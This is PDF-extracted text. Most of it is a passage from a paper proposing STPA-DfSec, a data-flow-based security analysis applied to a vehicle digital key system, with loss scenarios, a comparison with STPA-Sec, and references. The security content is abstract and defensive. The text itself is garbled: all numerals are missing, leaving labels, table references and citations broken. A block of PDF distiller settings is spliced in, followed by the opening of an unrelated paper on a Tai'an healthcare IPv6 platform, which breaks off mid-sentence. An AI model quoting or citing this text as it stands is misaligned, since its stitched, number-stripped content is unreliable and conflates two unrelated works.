identify system-level losses, vulnerabilities, and constraints. link vulnerabilities with corresponding losses and security attributes+. a general losses list is provided+ identify system-level losses, vulnerabilities, and constraints step : model the system structure model the system by functional interaction structure based on data flows*. a common function set for fis is provided+ model the system by functional control structure based on the control loop step : identify insecure items use adapted guide words* (“not being executed”, “being executed” and “being executed but exceeding the time limits”) to identify insecure function behaviors use guide words (“not providing”, “providing”, “too early, too late, out of order”, “stopped too soon, applied too long”) to identify insecure control actions step : identify loss scenarios use adapted guide words* (“function itself”, “execution environment (incl. function inputs, calling behaviors, computing resources, and links)”) to identify loss scenarios use guide words (“unsafe controller behavior”, “inadequate feedback and information”, “involving the control path”, “related to the controlled process”) to identify loss scenarios notes: + added features of the stpa-dfsec. * modified steps in comparison with the original stpa-sec. yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ system works. the asymmetric key algorithm is used in the communication with the cloud server, and the symmetric algorithm is used in the data transmission between the smartphone and the door controller. the research question in this case is: what are the security requirements of such an information-security-critical system? in this example, we assume that the connections between components have been established, but the connection is not ensured to be secure. the public and secret keys required for the cryptographic algorithms have been prepared in advance. in this research, we only focus on security issues, which means that the system can work properly without intended external disturbances and the system development errors and hardware random failures are out of the scope. analysis by stpa-dfsec the stpa-dfsec analysis of the example system is presented in this section. lock or unlock doors user register or login user smart phone cloud server door controller register or login send register or login data verify and execute register or login based on the vehicle order recordsregister or login result register or login result lock or unlock doors request a session key with signature verify signature, generate a session key for the communication response the session key send lock or unlock command get and execute command get the result assign the session key get the session key bluetooth wifi wifi figure sequence diagram of the example system. sequence diagram of two services of the example system, which are “user register or login” and “lock or unlock doors” services. full-size doi: . /peerj-cs. /fig- yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in step , the system-level losses (l) are firstly identified according to the provided general losses list (table ) as well as the purpose and functionalities defined in the system specification. then, vulnerabilities at the system level are considered. in this case, we use the c.i.a. security attributes (i.e., confidentiality, integrity, and availability) as the identification guide words to identify vulnerabilities in these three aspects. the related security attributes, together with the linked losses, are listed in the blankets after the vulnerability descriptions. finally, we convert the vulnerabilities into system constraints by directly inversing the vulnerable situations and describing what should be done if the vulnerability exploits. all the mentioned system-level losses, vulnerabilities, and constraints are listed in table . in step , the functional interaction structure is created based on the system data flows (shown in fig. ). we pick general functions in the proposed function database (table ), add some specific information related to this concrete system, and link them with data flow arrows based on the system sequence diagram (fig. ). in contrast to most traditional approaches, this analysis includes participants (user and manufacturer) outside the physical system boundary. functions in a human or a manufacturer can also be refined into more detailed movements like “make a discussion”, “press a button”, or “manage the passwords”. since we mainly focus on the physical part in this analysis, human movements are simplified as one “human operation” function. in step , insecure functional behaviors are identified by using the proposed guide words for each function. to increase the readability of this example case, the ifb labels of this demonstration are created in the form of “subjectname_func%d_ifb%d” (%d represents a number). for example, the first identified ifb of a function is notated as “phone_func _ifb ” (or “p_f _ifb ” for short as presented in the template (table )). identified ifbs of an example function are shown in table . in step , we consider the potential causes of previously obtained ifbs with the help of guide words and possible previous experience to identify loss scenarios of each ifb. table losses, vulnerabilities, and constraints of the use case. identified system-level losses, vulnerabilities, and constraints of the example case, with trace information in the bracket. l- : loss of physical property (incl. the vehicle and properties in it) l- : loss of non-physical property (incl. manufacturer’s reputation and intellectual property) v- : doors can be controlled by invalid users, which is not detected by valid users (e.g., a theft opens the door without being noticed.) [l- / , integrity] v- : doors can not be controlled by valid users (e.g., car owner can not lock the door when parking.) [l- , availability] v- : sensitive information (e.g., communication protocol and personal data) is leaked. [l- , confidentiality] sc- : doors should not be controlled by invalid users [v- ] sc- : if doors are controlled by invalid users, it must be detected and recovered [v- ] sc- : doors should always be controlled by valid users [v- ] sc- : if doors can not be controlled by valid users, it should be fixed within an acceptable period [v- ] sc- : sensitive information should be protected from leakage [v- ] sc- : if sensitive information is leaked, it should be detected and reactions need to be taken to minimize losses [v- ] yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ similarly, ls notations are created in the form of “subjectname_func%d_ifb%d_ls%d” (%d represents a number). for example, “phone_func _ifb _ls ” (or “p_f _ifb _ls ” for short as presented in the template (table )) is the notation of the first loss scenario of the ifb labeled “phone_func _ifb ”. examples of lss related to ifbs in table are listed in table . analysis by stpa-sec we also analyzed the example system by the stpa-sec. due to the same system model, the system-level losses, vulnerabilities, and constraints are the same as those in the stpa-dfsec analysis. therefore, the work here starts with drawing the system control table identified insecure function behavior examples. identified insecure function behaviors of the example function “encrypt data by s’s public key”. function gw: necv gw: ecv gw: etl phone_ func phone_func _ ifb phone_func _ifb , phone_func _ifb phone_func _ ifb ifb description: phone_func : “encrypt data by s’s public key” function phone_func _ifb : data is not encrypted, but the function is pretended to have been executed correctly [v- / ] phone_func _ifb : data is encrypted by a forged public key [v- / ] phone_func _ifb : data is encrypted with malicious algorithms [v- / ] phone_func _ifb : encryption process takes too long to violate the protocol time limits, which aborts the expected mission [v- ] smartphone (p) cloud server (s) door controller (d) public key transmit data to s secret key decrypt by symm. session key public keypublic key secret keysignature transmit data to p public key secret key signature transmit data to s encrypt by symm. session key plain data process plain data process process plain data transmit data to d transmit data to d i/o signal manufacturer (m) human operation user (u) human operation figure functional interaction structure based on data flows. functional interaction structure of the example case, including five system components and their data flow interactions. full-size doi: . /peerj-cs. /fig- yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table loss scenarios of ifbs. identified loss scenarios of the listed ifbs in table . ifbs gw: function itself gw: environment phone_func _ifb / phone_func _ifb _ls phone_func _ifb / phone_func _ifb _ls phone_func _ifb phone_func _ifb _ls / phone_func _ifb phone_func _ifb _ls phone_func _ifb _ls , phone_func _ifb _ls ls description: phone_func _ifb _ls : function is bypassed but returns a fake ok result phone_func _ifb _ls : valid key is replaced by a forged one phone_func _ifb _ls : algorithm is maliciously modified by the attacker phone_func _ifb _ls : algorithm is maliciously modified by the attacker, which requires more computing resource phone_func _ifb _ls : input length exceeds the limitation but is not detected phone_func _ifb _ls : computing resource is occupied by others maliciously smartphone (p) door controller (d) output (un)lock signal(un)lock doors cloud server (s) register or login, request a session key register or login result, responsed session key assign a session key user (u) register, login, (un)lock doors register or login result manufacturer (m) register register result register register result control actions feedback outputs execution feedback key assignment feedback figure control structure of the system. control structure of the example case, including five system components and their control loop interactions. full-size doi: . /peerj-cs. /fig- table identified insecure control actions. identified insecure control actions of the example action “smartphone registers at the server”. control action gw: not providing causes vulnerability gw: providing causes vulnerability gw: timing issues cause vulnerability phone_ctrlaction phone_ctrlaction _ insec phone_ctrlaction _ insec / label description: phone_ctrlaction : smartphone registers at the server (i.e., send account id, password and smartphone’s public key to the server) phone_ctrlaction _insec : smartphone does not register at the server correctly [v- ] phone_ctrlaction _insec : register is done successfully, but sensitive information (account id and password) is leaked [v- ] note: the guide word “timing issues cause vulnerability” represents “too early, too late, out of order” and “stopped too soon, applied too long” in the stpa-sec. yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ structure shown in fig. , and then insecure control actions (ica) are identified. examples of icas are shown in table , in which the first letter of the label represents the control action’s controller. finally, loss scenarios of each icas are identified. examples of lss are shown in table . outcome comparison functions and control actions are basic elements in the stpa-dfsec and stpa-sec respectively. normally, a control action includes several functions to provide a service. for example, the control action phone_ctrlaction (smartphone registers at the server.) consists of several functions including “plain data process”, “transmit data to s” and “encrypt data by s’s public key” and so on. therefore, the relationship between these two elements is that a sequence of the execution of functions forms a control action. to find out how both approaches work on the same use case, we mapped the analysis outcomes of both analyses. we found that a loss scenario identified by the stpa-sec can be mapped to several stpa-dfsec loss scenarios. for example, the loss scenario phone_ctrlaction _insec _ls (smartphone’s software is modified maliciously) can be mapped to phone_func _ifb _ls (function is bypassed but returns a fake ok result.), phone_func _ifb _ls (valid key is replaced by a forged one.), and phone_func _ifb _ls (algorithm is maliciously modified by the attacker.), which are all possibilities of causing losses related to the smartphone’s software. in reverse, an stpa-dfsec loss scenario can be related to several stpa-sec ones because different control actions between components always share the same transmission channels and data process units. no matter what the control action is “register”, “login” or “lock the door”, they all require the “process plain data”, “encrypt data by the key” and “transmit data” functions to perform the action. in conclusion, the stpa-sec focuses more on the application aspect of the system and aims to ensure the control actions secure, while the stpa-dfsec views the system as a table loss scenarios of icas. identified loss scenarios of the listed icas in table . insecure control action gw: controller gw: controller path gw: controlled process gw: feedback path phone_ctrlaction _insec phone_ctrlaction _insec _ls phone_ctrlaction _insec _ls phone_ctrlaction _insec _ls phone_ctrlaction _insec _ls phone_ctrlaction _insec phone_ctrlaction _insec _ls phone_ctrlaction _insec _ls phone_ctrlaction _insec _ls / ls description: phone_ctrlaction _insec _ls : smartphone’s software is modified maliciously phone_ctrlaction _insec _ls : the control command is blocked on the path phone_ctrlaction _insec _ls : server’s software is modified maliciously phone_ctrlaction _insec _ls : register is done correctly but returns a nok result phone_ctrlaction _insec _ls : no data protection mechanism is used at the smartphone phone_ctrlaction _insec _ls : data is eavesdropped and decrypted at the path phone_ctrlaction _insec _ls : no data protection mechanism is used at the server yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data process machine. it focuses on the security of the data process and flows and does not care the application meaning of the data. discussion finally, we discuss and conclude the differences and highlights of both approaches. the stpa-dfsec focuses on information flows and discusses possible vulnerabilities along the path of data flows, which helps to identify more detailed loss scenarios from the perspective of information flows. by contrast, the stpa-sec can reveal more insecure details linked to concrete application scenarios since control actions are derived from the application aspect. the stpa-dfsec addresses in which data process unit a loss scenario occurs, while the stpa-sec addresses in which application scenario a loss scenario occurs. to choose which approach to use depends on particular cases. two principles can be used to help the decision. the first one is according to the system purpose. if the analyst focuses on the data process and transmission security, the stpa-dfsec is more suitable for the analysis from the data side. if providing proper and secure services is the main object, the stpa-sec is applicable to identify insecure issues linking with application scenarios. the second principle is to consider who uses it. the stpa-dfsec is suitable for designers who are responsible for technical structure and design, while stpa-sec is more useful for ones who design the system functionalities and make more high-level decisions. note that the proposed approach does not rely on the known network vulnerabilities or attacks (e.g., eavesdropping and spoofing) since it is system-oriented and not threat- oriented. however, the known vulnerabilities can be used as clues when identifying system-level vulnerabilities in step . for example, “v- ” in table is actually a spoofing attack but does not use the word “spoofing” explicitly, and it is identified by the guide word “integrity”. the known vulnerabilities can be kept in mind in the whole analysis process and work as the secondary clues for identifying insecure behaviors or scenarios. however, the experience from previous projects is not necessary for our approach. for example, the loss scenario “transmission channel is monitored illegally” in table , which may be attributed to an eavesdropping attack or other denial of service (dos) attacks, is identified by the proposed steps and guide words and not by the known eavesdropping or dos attacks. analysts can use their preferred ways to describe the system vulnerabilities or choose proper identification guide words in the analysis. the known system vulnerabilities or attack types can help the identification but are not necessary conditions. two limitations of the stpa-dfsec have been identified. first, the stpa-based approaches lack the evaluation of identified scenarios. in practice, the resource for migrating insecure causes is limited. by evaluating and ranking the identified loss scenarios, the system designer can decide which insecure scenario should be avoided with high priority. to overcome this limitation, the stpa-based approaches can be used combining with other evaluation metrics (e.g., evita assessment method (ruddle et al., ) and common vulnerability scoring system (first, )) to assess the identified yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ insecure behaviors and scenarios. second, the analyst should have corresponding information about the data processing of the target system (e.g., how data flows among components and what kind of data process function is contained). otherwise, the functional interaction structure can not be constructed. in practice, system security engineering is not able to ensure absolute security but provides a sufficient base of evidence that supports claims that the expected level of trustworthiness has been achieved (ross, mcevilley & oren, ). the analysis in security engineering is also not able to be proven complete. the completeness of the analysis and how detailed the results are normally depend on the analyst’s knowledge and experience, design emphasis, and available system information. however, a proper systematic approach can help the analyst to be more confident in the analysis completeness (young & leveson, ). proper guide words help to reduce the dependency on personal experience and subjective thinking and lead to relatively objective and valid results with less effort. the case study in this article represents the authors’ understanding of the example system and works as a demo to show how to use the proposed approach. conclusion in this article, we have proposed a data-flow-based approach for security analysis of information-critical systems based on the stpa framework to overcome stpa-sec’s limitations. the analyses of a vehicle digital key system by using both the stpa-dfsec and stpa-sec have been presented as examples to show how to use the approaches. finally, we compared the analysis results, presented the differences between both approaches and discussed highlights and drawbacks of the proposed stpa-dfsec. we have found that the proposed stpa-dfsec focuses on data flows and can reveal more details in information security aspects, which can not be addressed directly in the stpa-sec analysis, while the stpa-sec analyzes the system from the perspective of applications and concerns more safety-related security issues. additionally, as an adaption of the stpa-sec, the proposed stpa-dfsec, together with other stpa-based approaches, can be used to co-design complex systems in multi-disciplines under the unified stpa framework. social aspects and human factors can also be included in the analysis, which are excluded from traditional analysis approaches. the proposed approach is not a substitution but a complement to the original approach. by using stpa-dfsec, we view the system from a new perspective (i.e., the data processing aspect) other than control loops and may find new points that are not directly identified by the stpa-sec. because of the relationship between the control action and the function in both approaches, the identified insecure items and loss scenarios can be mapped to each other, which helps to understand and design the system better. with the increasing connectivity and complexity of modern systems, more traditional safety-critical systems require information security to protect intellectual property or privacy nowadays (e.g., vehicles and healthcare devices). based on the already-established system stamp model of these systems, the proposed approach can be better integrated into the existing work and deal with the security aspect. furthermore, compared to the existing approaches, the stpa-based ones are the better solutions that analyze the system yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ at a high strategy level, which provides a new point of the view for the security analysts to get possible new ideas or understanding of the target system. in the future, we will study more real-world cases and conduct experiments with different groups of analysts to evaluate and refine the proposed approach in practice. furthermore, we will formalize the analysis process and design tools to achieve analysis results automatically for higher working efficiency. additional information and declarations funding this work was supported by the china scholarship council and funds of the german federal ministry of education and research under grant number kis . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: german federal ministry of education and research: kis . competing interests stefan wagner is an academic editor for peerj. author contributions � jinghua yu conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � stefan wagner conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � feng luo conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data are available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references caralli ra, stevens jf, young lr, wilson wr. . introducing octave allegro: improving the information security risk assessment process. technical report, carnegie-mellon university. available at https://resources.sei.cmu.edu/library/asset-view.cfm?assetid= . yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://resources.sei.cmu.edu/library/asset-view.cfm?assetid= http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ carter bt, bakirtzis g, elks cr, fleming ch. . a systems approach for eliciting mission- centric security requirements. in: annual ieee international systems conference (syscon). piscataway: ieee, – . carter bt, bakirtzis g, elks cr, fleming ch. . systems-theoretic security requirements modeling for cyber-physical systems. systems engineering ( ): – doi . /sys. . etsi. . etsi ts - : cyber methods and protocols. part : method and pro forma for threat, vulnerability, risk analysis (tvra). technical specification. european telecommunications standards institute. first. . common vulnerability scoring system v. . : specification document. available at https://www.first.org/cvss/v . /specification-document. friedberg i, mclaughlin k, smith p, laverty d, sezer s. . stpa-safesec: safety and security analysis for cyber-physical systems. journal of information security and applications : – doi . /j.jisa. . . . iso. . iso - road vehicles—functional safety—part : vocabulary. available at https://www.iso.org/standard/ .html. karatzas s, chassiakos a. . system-theoretic process analysis (stpa) for hazard analysis in complex systems: the case of “demand-side management in a smart grid”. systems ( ): doi . /systems . khan s, madnick s, moulton a. . cybersafety analysis of a central utilities plant (cup) gas turbine using stpa-sec. available at https://pdfs.semanticscholar.org/fc /c e a eee bf b cbb feb e b .pdf?_ga= . . . - . . leveson n, thomas j. . stpa handbook. available at https://psas.scripts.mit.edu/home/get_ file.php?name=stpa_handbook.pdf. mailloux lo, span m, mills rf, young w. . a top down approach for eliciting systems security requirements for a notional autonomous space system. in: ieee international systems conference (syscon). piscataway: ieee, – . martin h, bramberger r, schmittner c, ma z, gruber t, ruiz a, macher g. . safety and security co-engineering and argumentation framework. in: international conference on computer safety, reliability, and security, berlin: springer, – . microsoft. . the stride threat model. available at https://docs.microsoft.com/en-us/previous- versions/commerce-server/ee (v=cs. )?redirectedfrom=msdn. nist. . framework for improving critical infrastructure cybersecurity, version . . available at https://nvlpubs.nist.gov/nistpubs/cswp/nist.cswp. .pdf. olsson m. . healing vulnerabilities to enhance software security and safety. technical report, volvo technology ab. available at https://www.vinnova.se/globalassets/mikrosajter/ffi/ dokument/slutrapporter-ffi/elektronik-mjukvara-och-kommunikation-rapporter/ - eng. pdf. raspotnig c, karpati p, katta v. . a combined process for elicitation and analysis of safety and security requirements. in: bider i, halpin t, krogstie j, nurcan s, proper e, schmidt r, soffer p, wrycza s, eds. enterprise, business-process and information systems modeling. berlin: springer, – . ross r, mcevilley m, oren j. . nist special publication - : systems security engineering considerations for a multidisciplinary approach in the engineering of trustworthy secure systems. gaithersburg: national institute of standards and technology. ruddle a, ward d, weyl b, idrees s, roudier y, friedewald m, leimbach t, fuchs a, gürgens s, henniger o, rieke r, ritscher m, broberg h, apvrille l, pacalet r, pedroza g. . yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /sys. https://www.first.org/cvss/v . /specification-document http://dx.doi.org/ . /j.jisa. . . https://www.iso.org/standard/ .html http://dx.doi.org/ . /systems https://pdfs.semanticscholar.org/fc /c e a eee bf b cbb feb e b .pdf?_ga= . . . - . https://pdfs.semanticscholar.org/fc /c e a eee bf b cbb feb e b .pdf?_ga= . . . - . https://psas.scripts.mit.edu/home/get_file.php?name=stpa_handbook.pdf https://psas.scripts.mit.edu/home/get_file.php?name=stpa_handbook.pdf https://docs.microsoft.com/en-us/previous-versions/commerce-server/ee (v=cs. )?redirectedfrom=msdn https://docs.microsoft.com/en-us/previous-versions/commerce-server/ee (v=cs. )?redirectedfrom=msdn https://nvlpubs.nist.gov/nistpubs/cswp/nist.cswp. .pdf https://www.vinnova.se/globalassets/mikrosajter/ffi/dokument/slutrapporter-ffi/elektronik-mjukvara-och-kommunikation-rapporter/ - eng.pdf https://www.vinnova.se/globalassets/mikrosajter/ffi/dokument/slutrapporter-ffi/elektronik-mjukvara-och-kommunikation-rapporter/ - eng.pdf https://www.vinnova.se/globalassets/mikrosajter/ffi/dokument/slutrapporter-ffi/elektronik-mjukvara-och-kommunikation-rapporter/ - eng.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ security requirements for automotive on-board networks based on dark-side scenarios. available at https://zenodo.org/record/ . sae. . j : cybersecurity guidebook for cyber-physical vehicle systems. available at https://www.sae.org/standards/content/j _ /. schmittner c, gruber t, puschner p, schoitsch e. . security application of failure mode and effect analysis (fmea). in: international conference on computer safety, reliability, and security, berlin: springer, – . schmittner c, ma z, puschner p. . limitation and improvement of stpa-sec for safety and security co-analysis. in: international conference on computer safety, reliability, and security, berlin: springer, – . schneier b. . secrets & lies: digital security in a networked world. hoboken: john wiley & sons. shapiro ss. . privacy risk analysis based on system control structures: adapting system- theoretic process analysis for privacy engineering. in: ieee security and privacy workshops (spw), – may , san jose, ca, usa. piscataway: ieee, – . sidhu as. . application of stpa-sec for analyzing cybersecurity of autonomous mining systems. phd thesis. massachusetts institute of technology. torkildson en, li j, johnsen so. . improving security and safety co-analysis of stpa. in: proceedings of the th european safety and reliability conference (esrel), – september , hannover: research publishing services. wei lc, madnick s. . a system theoretic approach to cybersecurity risk analysis and mitigation for autonomous passenger vehicles. cambridge: mit sloan school of management. young w, leveson n. . systems thinking for safety and security. in: proceedings of the th annual computer security applications conference, new orleans, louisiana, usa, – . young w, leveson n. . inside risks-an integrated approach to safety and security based on system theory: applying a more powerful new safety methodology to security risks. communications of the acm ( ): – doi . / . yu j, luo f. . a systematic approach for cybersecurity design of in-vehicle network systems with trade-off considerations. security and communication networks : doi . / / . yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://zenodo.org/record/ https://www.sae.org/standards/content/j _ / http://dx.doi.org/ . / http://dx.doi.org/ . / / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. data-flow-based adaption of the system-theoretic process analysis for security (stpa-sec) introduction related work methodology case study discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , design and research of healthy ecology system framework based on ipv li qinyu tai'an finance health medical information technology co., ltd shandong radio, television and network co., ltd. tai'an branch. leigushi street, tai'an , shandong province e-mail: @ .com zhao hongwen shandong radio, television and network co., ltd. tai 'an branch. leigushi street, tai'an , shandong province e-mail: tagdglcs@qq.com geng an shandong radio, television and network co., ltd. tai 'an branch. leigushi street, tai'an , shandong province e-mail: @qq.com han lei shandong radio, television and network co., ltd. tai 'an branch. leigushi street, tai'an , shandong province e-mail: @qq.com abstract—with the improvement of living standard and the change of life, people’s health awareness has been enhanced as a whole, and the health demand has changed from single medical service to multiple services such as disease prevention, health promotion, healthcare and rehabilitation. the wisdom medical system, internet + medical service mode and digital hospital have become the direction of medical development. in order to build tai'an healthy big data ecological domain, accelerate the traditional medical process informatization reform, and improve the application level of information service, we build a medical system with the support of new generation network ipv technology. the system is based on the medical institutions in tai’an city, shandong province, and has researched and implementation of the health ecosystem business structure, core technology, network architecture, system software and hardware, and system security. the system was put into trial operation in the medical institutions of the whole city and has achieved perfect results. keywords-ipv ; internet +; healthy ecology; health platform i. the current status of health care a. medical health background a new round of scientific and technological revolution and industrial changes are accelerating. life science technologies continuously made new breakthroughs, and major technologies such as genetic engineering, molecular diagnostics, stem cell therapy, and d printing are accelerating applications. the new generation information biology and engineering technologies such as big data, cloud computing, internet, artificial and intelligence are increasingly integrated into the medical and health fields. the rapid doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , development of telemedicine, mobile medical care, precision medical care, smart medical care and other technologies have promoted the vigorous development of new formats and models of health industry, such as health management, health care, health tourism, leisure and health care, and “internet + health”. “ th five-year plan for national population health informatization development” pointed out: we should strengthen population health informatization and health care big data service system construction, promote integration of government health care information system and public health medical data fusion, and eliminate information barriers, focus on improving the ability and level of population health information governance, vigorously promote the development of health care big data applications, and explore new models and new formats of innovative "internet + health" services. we will build a unified, authoritative and interconnected platform for population health information, standardize and promote "internet+ health care" services, and create new models of internet health care services. data collection, integration and sharing and business coordination of applied information systems such as public health, family planning, medical services, medical security, drug supply and comprehensive management are realized. in recent years, the aging population in shandong province is characterized by large base, rapid growth and empty nest. on the one hand, the needs of elder's life care and medical health care are superimposed, and the consumption demand in the field of medical care, health care are strong, with huge space for the development of related industries. on the other hand, the health care industry in shandong province is still in its infancy, with relatively insufficient supply-side capacity, structural contradictions and policy barriers, lack of high-quality resources, narrow coverage of medical care, and insufficient professional personnel, making it difficult to meet the needs of the elderly for different levels of health care services. b. tai'an health care platform in , tai'an city proposed in the of “tai'an city transformation and upgrading of medical and health service industry implementation plan” to accelerate the construction of "smart medical" system, explore the "internet + medical" service mode, and build a digital hospital. we will build a sound healthy tai'an big data ecological domain, accelerate the informatization reform of traditional medical treatment process, and improve the application level of informatization services. the government encourages medical and health institutions to make full use of the advantages of internet development. the design and research of this system is based on the medical informatization of tai'an city, shandong province, which is led by tai’an central hospital of tai'an city, tai'an central hospital and tai'an city hospital of traditional chinese medicine. the district and county people's hospitals are the main force, and the informatization development of the hospital is relatively perfect. however, some secondary hospitals, primary health care institutions, medical associations, medical communities, internet hospitals, regional medical and health platforms and other information systems are not perfect, and they are unable to meet the growing needs of medical information development. take the 